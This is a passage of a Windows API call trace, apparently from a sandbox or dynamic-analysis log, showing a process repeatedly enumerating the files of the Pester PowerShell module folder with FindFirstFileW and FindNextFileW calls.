lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0182.233] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b69c0 [0182.233] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.234] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0182.234] FindNextFileW (in: hFindFile=0x1a9b69c0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.234] FindClose (in: hFindFile=0x1a9b69c0 | out: hFindFile=0x1a9b69c0) returned 1 [0182.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.234] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0182.234] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0182.234] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6480 [0182.235] FindNextFileW (in: hFindFile=0x1a9b6480, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.235] FindNextFileW (in: hFindFile=0x1a9b6480, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0182.235] FindNextFileW (in: hFindFile=0x1a9b6480, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0182.235] FindClose (in: hFindFile=0x1a9b6480 | out: hFindFile=0x1a9b6480) returned 1 [0182.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd9a0) returned 1 [0182.235] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0182.235] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b7dd430, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0182.236] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b7dd640 | out: lpFindFileData=0x1b7dd640*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6780 [0182.236] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.236] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0182.236] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0182.237] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0182.237] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0182.237] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0182.237] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0182.237] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0182.237] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0182.238] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0182.238] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0182.238] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0182.238] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0182.238] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0182.239] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0182.239] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.239] FindClose (in: hFindFile=0x1a9b6780 | out: hFindFile=0x1a9b6780) returned 1 [0182.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8f0) returned 1 [0182.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8b0) returned 1 [0182.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd9a0) returned 1 [0182.239] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0182.239] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b7dd430, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0182.239] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b7dd640 | out: lpFindFileData=0x1b7dd640*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b68a0 [0182.240] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.240] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0182.240] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0182.240] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0182.240] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0182.240] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0182.241] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0182.241] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0182.241] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0182.242] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0182.242] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0182.242] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0182.242] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0182.243] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0182.243] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0182.243] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, 